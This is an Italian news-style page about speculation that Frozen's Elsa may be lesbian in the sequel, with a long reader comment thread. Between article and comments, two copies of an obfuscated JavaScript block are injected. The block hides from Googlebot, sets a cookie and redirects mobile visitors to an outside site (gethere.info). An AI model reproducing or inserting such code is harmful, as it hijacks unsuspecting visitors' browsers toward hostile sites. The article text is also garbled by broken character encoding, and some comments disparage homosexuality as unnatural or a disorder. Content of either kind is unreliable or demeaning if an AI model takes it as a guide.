Elsa di Frozen omosessuale: le reazioni di politici e genitori

elsa frozen gay

Elsa di Frozen potrebbe diventare lesbica nel seguito del film Disney. Questa possibilitAi?? non spaventa i genitori nonostante le dichiarazioni della regista e sceneggiatrice di "Frozen - Il regno di ghiaccio", Jennifer Lee che in un'intervista all'Huffington Post ha detto la sua circa l'evoluzione che potrebbe avere il personaggio nel film per ragazzini.

Sui social A? diventato virale l'hashtag #GiveElsaAGirlfriend proprio perchAi?? in molti vorrebbero dare un dolce metAi?? ad Elsa. L'ipotesi A? quella di fare in modo che la principessa abbia una relazione di tipo amoroso con una donna per dar forza ad un messaggio alternativo.

Il successo di Frozen e l'evoluzione di Elsa

La pellicola giAi?? alla sua prima uscita riuscAi?? a conquistare circa 1 milione e 276.000 dollari. Questo personaggio secondo la comunitAi?? LGBT sarebbe in grado di rompere alcuni schemi e quindi potrebbe essere un ottimo modo per lanciare i personaggi omosessuali nel mondo Disney. Essa A? un personaggio davvero molto particolare ed A? molto probabile che nella prossima puntata del film potrebbe dare ai suoi fans, nuovi risvolti.

Le reazioni all'ipotesi su Elsa omosessuale

La scelta potrebbe far discutere secondo quelli che sono i commenti di alcuni gruppi di genitori ma, in linea generale, sembrerebbe che l'opportunitAi?? che Elsa diventi lesbica non preoccupa la maggior parte dei genitori, che si dicono abbastanza tranquilli in merito all'evoluzione del personaggio Disney. C'A? chi si spiega infatti, a favore e chi contro. In particolare, alcuni leader del centro-destra avrebbero detto il loro no tassativo a queste ipotesi mentre invece, in generale sembra abbastanza indifferente la tendenza che potrebbe prendere il film per bambini nei prossimi mesi.

Molto interessante anche il punto di vista di un gruppo di giovani omosessuali che in rete hanno specificato come invece, anni anni di storie Disney di fatto non erano li hanno resi eterosessuale. Ecco perchAi?? l'invito A? quello di lasciare fuori la politica oppure le opinioni di influencers da un semplice film per bambini. Mentre il dibattito va avanti, a breve potrebbero emergere le nuove parti della sceneggiatura che sono destinate a far discutere.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

160 comments

  1. Livia Scevola 6 marzo, 2018 at 15:33 Rispondi

    Io sono a favore. Cosi forse sta storia entra nelle teste dure e la smettono di rompere le scatole. Anche perchè quest’odio verso gli omosessuali sta solo creando nuovo massacri.

    • Laureta Shima 6 marzo, 2018 at 15:48 Rispondi

      Non è giusto che i bambini già da piccoli devono sapere I sbagli della natura oppure la curiosità li possa portare a esperimentare cose che magari nemmeno loro posano capire . Ogni cosa nel tempo giusto .

    • Livia Scevola 6 marzo, 2018 at 15:54 Rispondi

      Laureta Shima non la penso cosi, il bambino in realtà sa già molte cose di se stesso. Ci sono molti bimbi che già a 5 anni si sentono bimbi o bimbe. Basta farli crescere come so sentono dentro. Siamo noi gli adulti a frenarli. Mia figlia ha 4 anni e gioca con macchinine e bambole, con i videogame (insieme a me e il mio compagno) e con i miei trucchi e soprattutto ha due zii gay e lei non se ne frega proprio, non vede differenza.

    • Maria Teresa Ceravolo 6 marzo, 2018 at 15:58 Rispondi

      I bambini devono scoprire e imparare altri valori molto più importanti.Attraverso i cartoni dovrebbero imparare il rispetto,l’amore verso il prossimo,a rispettare i coetanei,le maestre ed a non fare il bullismo e tutto ciò che li circonda.Queste cose sono soltanto mirate a turbare e confondere i bambini e cercare di cambiargli l’identità..il non riconoscere più’ chi sono.Smettetela!!! Le lotte bisogna farle per un cambiamento di crescita educativa.

    • Manuela Guercio Moretti 6 marzo, 2018 at 16:16 Rispondi

      Laureta Shima sbaglio della natura? Quindi anche “il gobbo di notre dame” è uno “sbaglio della natura” da non mostrare ai bambini? Ma poi sbaglio della natura? Ma che cazzo vi dice il cervello? 🤦🏽‍♀️

    • Francy Rota 6 marzo, 2018 at 17:17 Rispondi

      Ma ve la menate x un cartone? Mia figlia a 4 anni sa che i nostri amici si vogliono molto bene come mamma e papa’ …siamo noi genitori che dobbiamo spiegare ai bambini con parole semplici le verita’ …io lascere il cartone con uomo e donna dopo tutto anche gli omosessuali sono nati da un padre e una madre .

    • Delladio Elisa 7 marzo, 2018 at 12:44 Rispondi

      Ognuno di vivere la propria vita ma dire che non sia contro natura no ….e cmq se siete qui a scrivere e discutere perché siete stati creati da un uomo e una donna o ora si puo venire al mondo cosi per l opera dello spirito santo …ma smettetela va

    • Maria Teresa Ceravolo 7 marzo, 2018 at 12:58 Rispondi

      Cara Livia😊io ho una mente abbastanza aperta in tutto e in particolar modo con i bambini.Sembrate tutti a favore sui social…perché siete ipocriti…Io vedo persone che spendono tanti soldi dai terapisti,per avere figli sani di mente.Mentre tutti quelli che siete a favore di queste schifezza,state provocando un disturbo mentale nei vostri figli.Fate i veri genitori e fate crescere i bambini con sani principi che sicuramente non vi pentirete.Poi ognuno crede e fa’ ciò che vuole.Non sono io e non spetta a me giudicare…ma sicuramente spetta a me l’educazione dei miei figli..che non e’ certo questa qui.

    • Jenny Parolari Brusati 6 marzo, 2018 at 17:13 Rispondi

      Concordo,lady Oscar innamorata di Maria Antonietta e Georgie che sarà stata pure etero,ma ne cambiava uno a puntata,e mi pare che siamo vivi e vegeti.Anzi nn c’è nessuno meglio di un bambino nel capire che nn esiste solo l’amore tra uomo e donna.

    • Simona Galdi 6 marzo, 2018 at 17:49 Rispondi

      Ammazza avete visto lady Oscar e nn avete capito mai una cippa …lady Oscar bacia Maria Antonietta e balla.con lei solo una sera per tenerla lontana dal Conte di.fersen e spostare l.attenzione dall inciucio tra l altro questa scena è presente solo nel film ma forse voi avete visto una versione non censurata dell anime …ma sto per dirvi una cosa che forse non sapete a lady Oscar piaceva il Cazzo infatti è proprio questo il nocciolo di tutta la storia la sua tormentata scelta tra essere una donna e cioè innamorarsi e vivere da donna dell epoca o diventare per sempre un uomo e vivere da soldato la sessualità non c entra nulla donna o uomo gli sarebbe piaciuto cmq il pistolino

    • La Ele 6 marzo, 2018 at 21:08 Rispondi

      Lady Oscar, la sigla parlava chiaro il re voleva un maschietto ma aimè sei nata tu…
      Cmq lei non era omosessuale si vestiva da maschio ma amava gli uomini, qui si parla d’altro.
      Io sono del parere che il mondo dei bambini andrebbe lasciato stare da certi dogmi…
      Non riesco a capire il perché ultimamente le famiglie “tradizionali” vengano messe in cattiva luce… mah

    • Stefania Cilona 6 marzo, 2018 at 23:57 Rispondi

      Uè non diciamo eresie! Lady oscar era una donna cresciuta come un maschio perché così volle suo padre. Si innamora del principe fersen ma lui era innamorato di maria Antonietta e avrà poi la sua scena d’amore con andre’ .
      Non bacia mai maria Antonietta ma è il piccolo principe che bacia lady Oscar prima di morire perché affetto da grave malattia 😒
      I nostri cartoni non ci hanno traumatizzato perché erano cartoni veri, che raccontavano storie vere o possibili, talvolta forse tragici, ma era un vivere quotidiano e con lady oscar abbiamo persino studiato storia 🤪

    • La Ele 7 marzo, 2018 at 07:49 Rispondi

      Beatrice Nucci anche semplicemente la domanda di questo post…
      Io sono dell’idea che il mondo dei bambini non andrebbe toccato, i nostri cartoni avevano una morale sempre, si vedeva il rispetto del bambino verso l’adulto, il rispetto nei sentimenti e nell’amicizia…
      Ma ultimamente mi sembra che tutte queste cose siano vecchie e scadute, dove nessuno ha rispetto per il prossimo, inoltre mi pare con questa storia della Disney che bisogna per forza continuare a dimostrare chissà cosa, milioni di bambini hanno sognato con i cartoni della Disney lasciamo fuori almeno dal loro mondo certe discussioni, l’Italia certo non crolla per un cartone animato…
      Il mio pensiero😊

    • Delladio Elisa 7 marzo, 2018 at 12:40 Rispondi

      Ma che dite se si era innamorata del principe fersen e senza parlare di André ma ce la fate !!!!!…. Non sono omofoba ma i bambini lasciamoli crescere naturalmente senza mettergli idee strane !

    • Alex Castagna 7 marzo, 2018 at 22:10 Rispondi

      Valentina Fedrigo concordo in pieno con questo commento e gli altri sotto c’è troppa ostentazione, programmi televisivi che dovrebbero essere trasmessi fuori dalle fasce protette, ma siccome fa odiens freghiamocene dei bambini

  2. Maggie Cammarota 6 marzo, 2018 at 15:46 Rispondi

    I personaggi omosessuali nei cartoni mi hanno accompagnato durante tutta la mia infanzia.
    Lady oscar, ranma 1/2 ed il mio preferito: sailor moon!
    Basta creare casini inutili ed insegnate ai vostri figli che l’amore è bello sempre e comunque, a prescindere da chi si ama!

  3. Alessandra Castagna 6 marzo, 2018 at 15:50 Rispondi

    Ma credo che i bimbi di oggi non si facciano nessun problema..anche perché gli omosessuali sono persone. E i genirori devono solo spiegare senza nascondere nulla e sicuramente non avranno nessun trauma..

  4. Valentina Rulfi 6 marzo, 2018 at 15:51 Rispondi

    E che problema c’è?
    I cartoni giapponesi di noi degli anni 90 avevano di tutto e di più.. lady oscar che manco lei sapeva se era uomo o donna, in sailor moon Sailor Urano e Sailor Nettuno stavano insieme.. Ranma per la metà del tempo era maschio e l’altra metà femmina..
    Per non parlare di altri cartoni.. scusate Lamù era praticamente una pornostar in leopardato 🤣🤣🤣🤣
    Il Genio di Dragonball non faceva altro che palpare culi e tette..

    Insomma adesso ci scandalizziamo se la Disney ha deciso di mettersi al passo coi tempi?

  5. Morena Vinci 6 marzo, 2018 at 15:59 Rispondi

    La malizia ed il condizionamento mentale è negli occhi di chi guarda.i bambini vedono le cose per come sono SEMPLICI.ai bambini non importa una mazza del sesso opposto inizieranno a preoccuparsene più avanti…Quando comunque in ogni caso entreranno in contatto con.altre visioni del mondo…cosa farete tapperete loro gli occhi per sempre o ad ogni età saranno.libero.di elaborare i pensieri di avere o.meno una malizia e di farsi delle idee PROPRIE?….evitamo problemi dove non.esistono….un cartone animato agli occhi di un bambino rimane ciò che è….

  6. Silvia Mazzone 6 marzo, 2018 at 16:03 Rispondi

    Io penso che prima bisognerebbe vedere come il personaggio è inserito nel contesto, forse non offendera’ la sensibilità di nessuno ed è inutile che ci si bagni prima che piova. In ogni caso i bambini sono fantastici e che per fortuna vedono le cose come sono senza metterci della malizia o peggio dello sporco.

  7. Jessica Artale 6 marzo, 2018 at 16:08 Rispondi

    Leggo tanti messaggi ipocriti… xké secondo me tutte voi che siete pro a questa cosa,siete le prime che se vedete una coppia di donne che si bacia in mezzo alla strada vi mettete a fissare e perché no,anche a ridere.IPOCRITE !

    • Martina Zoccoletto 6 marzo, 2018 at 17:03 Rispondi

      Non ho parole ma che film ti fai in testa..uno scrive che non trova nessun problema se Frozen avrà una dolce metà femminile e tu vai a fare sto discorso (che forse dovevi fare a chi si scandalizza se vede 2 ragazze mano nella mano)
      La prima domanda che mi viene è
      -ma in che paese vivi? 🤣
      La seconda
      -ma quando esci stai a guardare tutte le coppie? 🤔

    • Jessica Artale 6 marzo, 2018 at 17:07 Rispondi

      Io non mi faccio nessun film… è la realtà dei fatti ! Mi sembrate tutte cosi per bene… ma qui si parla di omosessualità,ma parliamo di razzismo oppure di persone obese.. il discorso non cambia,guardereste e no con occhi normali ,perciò smettetela di fare la predica a me,e scusate se ho toccato un tasto dolente,perché qualora la cosa non vi importa non dovreste perdere tempo a commentare quello che scrivo io,anzi fatevi un esame di coscienza.

    • Ilaria Liut 6 marzo, 2018 at 19:22 Rispondi

      Più che ridere, sorrido, perché mi rende felice sapere che quelle persone si amano! Mi scandalizza molto di più vedere coppie etero che si slinguazzano e toccano dappertutto, piuttosto che un bacio casto (omosessuale o etero che sia). E ai miei figli insegneró che è una realtà che esiste, potranno essere loro stessi omosessuali o avere amici che lo sono. Ma questo non significherà che siano persone peggiori!

  8. Federica Marino 6 marzo, 2018 at 16:09 Rispondi

    Credo che ogni bambino ha i suoi tempi per capire certe cose perché molti abituati al modello familiare composto da uomo e donna… È giusto che capiscano l omosessualità non di certo da un cartone animato ma dai genitori quando questi ritengano che sono pronti per capire …ed è giusto che capiscano che nella vita ognuno è libero di amare chi vuole indipendentemente dal sesso… Non creando delle barriere mentali nei confronti degli omosessuali

    • Anglide Ithil Quessir 6 marzo, 2018 at 16:33 Rispondi

      Si, ma non si.vuole creare un cartone per spiegare l’omosessualità… lady oscar, ranma, sailormoon non hanno traumatizzato proprio nessubo e le nostre mamme nn hanno mai fatto tante menate come quelle di oggi…ah vabbè, ma le mamma pancine sono informate…giust

    • Federica Marino 6 marzo, 2018 at 16:36 Rispondi

      Se lo fanno in modo indiretto come nel film uscito recentemente la bella e la bestia (l amico di gastone) va bene… Ma se ci sono scene di baci credo non sia bello… Cmq credo che spetti ai genitori valutare nel momento in cui uscirà nelle sale se far vedere o meno il cartone animato… È soggettivo…☺

    • Noemie Nanà Sansonetti 8 marzo, 2018 at 01:42 Rispondi

      Scusa agli adolescenti che sono più confusi faresti vedere una cosa del genere creando ancora più confusione? E poi dimmi dove li porti quando si porteranno il peso di coscienza x aver fatto un errore simile? Ho una cara amica che in età adolescenziale ha creduto di essere gay…ma
      Ha capito di non esserlo e si è martoriata fino allo
      Sfinimento diventando anoressica! Scusate quindi ai bambini e agli adolescenti spiegate xke i figli nascono da una Madre e da un padre e non da due mamme o due papà! Da adulti se decidono sono loro ma nn capisco xke creare già confusione!

    • Federica Marino 8 marzo, 2018 at 08:57 Rispondi

      Infatti non ho detto che va spiegato in adolescenza… Ho detto che ogni bambino ha i suoi tempi per capire… Io ho un bimbo di 10 anni a cui ho gia spiegato quasi tutto con molta tranquillità e molta attenzione.. Ma di certo a mia figlia di 3 anni no… Cmq ripeto è soggettivo.

    • Francesca Siani 6 marzo, 2018 at 23:56 Rispondi

      La Disney è troppo avanti… È e sempre sarà modello per i bambini e meno bambini … troppe mammine bigotte k 1. Sono cresciute con cartoni come lady Oscar e cmq hanno optato per il pene a 15 anni 2. Magari guardano programmi qualsiasi in tv anche il pomeriggio dove gira lo schifo totale.. 3. Siamo nel 2018 è sn più bigotte di mia nonna degli anni 40

    • Noemie Nanà Sansonetti 8 marzo, 2018 at 01:45 Rispondi

      AdriEli EspostoAmato ma cosa c’entra? Ma sono certa che due pinguini maschi nn riescono a farlo un uovo!!!!!!!!!! X favore non inventate logiche inesistenti! Che poi tollerate è un discorso ma smettetela di dire baggianate!

  9. Elena De Lucia 6 marzo, 2018 at 16:15 Rispondi

    Io prima di gridare allo scandalo starei a vedere… gli sceneggiatori Disney non sono sicuramente degli sprovveduti… sapranno rendere la cosa adatta alla comprensione dei bambini e xché no, potrebbe essere un’occasione x rispondere alle domande dei bambini senza imbarazzo

  10. Serena Pieracci 6 marzo, 2018 at 16:17 Rispondi

    Siamo nel 2018 e ancora si devono leggere certe affermazioni e sentire ancora parlare di omosessualità come sbaglio o malattia! Ma vivete e lasciate vivere!!! Poi questi sono gli stessi genitori che ai figli comprano i giochini di guerra e di lotta, ah quelli non fanno male eh? I bambini grazie a dio non hanno la malizia ed i nostri limitati schemi mentali.

  11. Silvia Rosa 6 marzo, 2018 at 16:32 Rispondi

    Io ho diverse amiche gay di vecchia data, non ho mai avuto problemi a frequentare donne o uomini con orientamenti sessuali diverso dal mio. Ma io sono una persona adulta con un’identità formata e definita. Mia figlia ha 3 anni e gioca a far finta di essere elsa o anna dalla mattina alla sera. Non ho nessuna intenzione di farle confusione con cartoni animati che devono insegnare (???) la diversità. Man mano che crescerà se mi chiederà le spiegherò ma ogni cosa a suo tempo. E con i tempi di mia figlia non con quelli della disney. Che le persone hanno diritto di volersi bene lo impari con le persone non con i cartoni della disney.

    • Rossella Biagioli 6 marzo, 2018 at 17:18 Rispondi

      Farle confusione??? Direi piuttosto spiegarle che ci sono altre realtà che ESISTONO e non fare gli struzzi. I cartoni si sono da sempre evoluti con la società. É solo una forma d’amore in più da raccontare sono sicura che tua figlia, come tutti i bambini non avrà problemi a capire.

    • Silvia Rosa 6 marzo, 2018 at 18:18 Rispondi

      Ripeto: io l’esempio lo do con le persone e non con i cartoni. Frequentando solo persone per bene posso permettermi questo lusso. Dalla coppia tradizionale, alla coppia di amiche gay a ragazze che tutto sembrano tranne che ragazze. Tutte persone per bene con ampio senso del decoro che non mi vergogno a far frequentare a mia figlia. Che crescendo capirà che ci sono donne che amano gli uomini, donne che amano le donne, donne che non si sentono donne. Ma prima di avere identificato un genere come volete fare voi perbenisti dell’ultimo momento avrà identificato una persona. Si sarà fatta un’idea della sua vita e del suo percorso e non vedendola baciare qualcun’altro chiunque esso sia ma conoscendo LA PERSONA nelle piccole cose. Voi volete la strada veloce per sentirvi grandi della vostra tolleranza, della vostra apertura mentale. Io invece voglio che mia figlia diventi una persona capace di vedere e di ascoltare veramente. Si guardi pure frozen 2 con i suoi figli. Io i miei figli non ho bisogno di indottrinarli nè positivamente nè negativamente.

  12. AdriEli EspostoAmato 6 marzo, 2018 at 16:44 Rispondi

    Come hanno detto in alcuni commenti gli anni 90 sono stati pieni di cartoni che inneggiano alla sessualità in ogni aspetto…Lady oscar era bisex, Ranma si trasformava da uomo a donna, Georgie per non sbagliare si è fatta entrambi i fratellastri, piccoli problemi di cuore altro non è che la storia di 2 famiglie che vivono insieme perché scambisti….e se si cerca su Internet se ne trovano altre di verità celate. Quindi ben venga che la Disney va contro corrente….che cmq già da un po’ lp stereotipo della principessa è cambiato…

  13. Daniela Guadagni 6 marzo, 2018 at 17:03 Rispondi

    Non c è nulla d male se fosse un film orientato a ragazzi adolescenti..ma penso che i bambini vengano un po confusi..
    Di solito si imitano i cartoni che si vedono durante il gioco..le bambine cosa faranno le fidanzatine?? 😕

  14. Chiara D'Onofrio 6 marzo, 2018 at 19:22 Rispondi

    Sono una grandissima fan di Lady Oscar da quando è uscito la prima volta. Su Elsa mi sembra una forzatura, perché in Frozen 1 da nessuna parte si intende un orientamento omosessuale. Elsa e’ già moderna così: una principessa salvata nn dall’ amore di un principe azzurro, ma dall’amore di una sorella. Inoltre, governa benissimo senza avere un re. Benissimo se Disney vuole affrontare l’omosessualità, ma preferirei un cartone con un personaggio ex novo e nn “reciclato”

  15. Katalin Gabriella Pozsgai 6 marzo, 2018 at 20:04 Rispondi

    È un cartone animato fatto per piccoli,non è il caso di confonderli e spiazzare questi bimbi ,anzi bimbe.Ci sarà tempo per parlare di omosessualità più avanti.Non spacciamo per normalità ( o se la parola non vi piace per regolare o per standard) quel che non è,insegnare che questa è la regola della natura è sbagliato .

    • Katalin Gabriella Pozsgai 6 marzo, 2018 at 22:51 Rispondi

      Non ho detto che non sono normali ,ma cmq non è la standard,non è la regola,sono una minoranza rispetto all’ etero.Se i miei figli mi domandano dirò che ci sono anche donne che amano donne e uomini che amano uomini.Ma perché mettere la questione in un cartone per piccole?Non è un film,che pure ci sono (questo trovo giusto ),ma un cartone animato.

  16. Floryana Quattrocchi 6 marzo, 2018 at 20:12 Rispondi

    … vorrei ricordare a tutte le donne che hanno citato Lady Oscar in questo post che è vero che si trattava di una donna vestita da uomo … ma aveva ben chiaro dentro di se cos’era visto che si è innamorata prima del Conte di Fersen e poi di Andre … e diciamolo nessuna di noi ha mai dubitato che fosse donna, la trovavamo tutti bellissima e affascinante !!!! Ma sinceramente i cartoni devono lasciare lo spazio alla fantasia e all’immaginazione senza trattare tematiche complesse e riservate all’educazione dei genitori.

  17. Giovanna Panarese 6 marzo, 2018 at 20:52 Rispondi

    A Natale sono stata a vedere uno spettacolo con protagonista Elsa. Questa era interpretata da un trans. La scelta non mi è piaciuta. I bambini lasciamo che vivano pia pianino ogni cosa. Per fortuna non si sono accorti di nulla e non hanno fatto domande ma se mia figlia me ne avesse fatte a tre anni è difficile spiegare. A quell’età vale più l’esempio che le parole. E io sono una molto aperta e rispettosa delle diversità e delle scelte altrui. CONTRARIA

  18. Ilenia Cardano 6 marzo, 2018 at 21:51 Rispondi

    Io credo che i bambini debbano avere dei modelli maschili e femminili di pari importanza. Che l’amore possa avere mille sfaccettature magari è meglio che lo imparino nella realtà, con dei genitori che glielo spieghino. E se poi il bambino dovesse fare domande almeno non rimarrebbero inespresse

  19. Dany Gargiu 6 marzo, 2018 at 22:17 Rispondi

    Contraria!Non è il caso di confondere i bambini specialmente i più piccoli…Tra l’altro Lady Oscar non era una donna che amava uomini? Mi sono persa qualcosa…

  20. Simona Gazzano 6 marzo, 2018 at 23:00 Rispondi

    Ma magari…insegnamo a.non.porci neppure.più la.questione,perché non c’è nulla.da.questionare.
    W l’amore, che.è.di tutti.e.per.tutti!!! Io a mio figlio.insegno.questo❤❤❤

  21. Alessandra Costa 7 marzo, 2018 at 06:35 Rispondi

